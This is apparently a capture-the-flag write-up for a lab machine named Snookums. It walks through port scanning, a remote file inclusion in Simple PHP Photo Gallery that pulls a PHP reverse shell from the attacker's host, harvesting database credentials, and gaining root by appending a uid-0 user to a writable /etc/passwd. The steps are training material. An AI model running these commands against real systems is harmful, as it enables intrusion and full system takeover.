# Snookums

## Nmap

```
sudo nmap 192.168.230.58 -p- -sS -sV

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp  open  mysql       MySQL (unauthorized)
33060/tcp open  mysqlx?
Service Info: Host: SNOOKUMS; OS: Unix
```

Port 80 directs us to index.php for Simple PHP Photo Gallery. As we can see at the footer of the page we are on v08.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-26cc1922efe4864607f1053ae18fb356fe92dafc%2Fimage.png?alt=media)

Running `dirsearch.py` against the target website produces the following found directories:

```
python3 dirsearch.py -u http://192.168.230.58 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-28a3602bd70c543f5ad8fb264bd9c7a3513d307f%2Fimage.png?alt=media)

Of the directories none are of particular interest so far after manual inspection. Searching on Google for exploits we do have a public exploit for RFI on v0.7.

{% embed url="<https://www.exploit-db.com/exploits/48424>" %}

As per the exploit page the PoC for this is:

```
 site.com/image.php?img= [ PAYLOAD ]
```

Browsing to image.php shows the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-12ad0212004a38b15dfb45f10ec709901e2a9b02%2Fimage.png?alt=media)

From here we can test RFI by starting a `Python SimpleHTTPServer` on our attacking machine and try to browse to a test.txt file which contains the contents 'hello'.

```
http://192.168.230.58/image.php?img=http://192.168.49.230/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6489ce96905e80a4327957e4fcc7ef8a73abe821%2Fimage.png?alt=media)

As this has worked for us and we know the target is running PHP we can attempt a PHP reverse shell. I set a PHP Reverse shell to listen in on port 21 then browsed to it at:

```
http://192.168.230.58/image.php?img=http://192.168.49.230/phpshell.php
```

Which resulted in a shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01ec35f7eaad1e7f9c8a152251937f8f429909df%2Fimage.png?alt=media)

Browsing /var/www/html shows a db.php file. Reading the contents of this provides us with login information for MySQL.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03737b7cc4bba0929726eae760bcfc955a7a50b4%2Fimage.png?alt=media)

Once logged into MySQL locally we can see a database called 'SimplePHPGal'. Selecting the database and showing the tables reveals the 'users' tables. Selecting all columns from this provides us with some usernames and base64 values.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c60fc9c73329f643084e9370dd8eb9db4ec3a35%2Fimage.png?alt=media)

These values need to be decoded twice to view the plaintext value:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f5c444a855f811e0d85bce5778a85f3e993331b3%2Fimage.png?alt=media)

| Username | Password                |
| -------- | ----------------------- |
| josh     | MobilizeHissSeedtime747 |
| michael  | HockSydneyCertify123    |
| serena   | OverallCrestLean000     |

Viewing the contents of /etc/passwd shows two outstanding users, michael and GitRekt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8037a4cb40b3521537c6e20ae486209e94e7cf86%2Fimage.png?alt=media)

We can then attempt to `SSH` in as michael with the potential credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84cb651886b1e3dff98df401b615bb95e49505f2%2Fimage.png?alt=media)

Linpeas reports the /etc/passwd file is writeable by us.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-811b97c54ae6f89161f196dde73eb94cddb8103d%2Fimage.png?alt=media)

Knowing this we can setup a new root user to be created.

Generate password on attacking machine:

```
openssl passwd -1 -salt password password 
```

Echo the password and new user to the end of /etc/passwd on the target machine.

```
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
```

`su` to new user:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-985fd573b1a8babad096800efc15b3aca94de5fc%2Fimage.png?alt=media)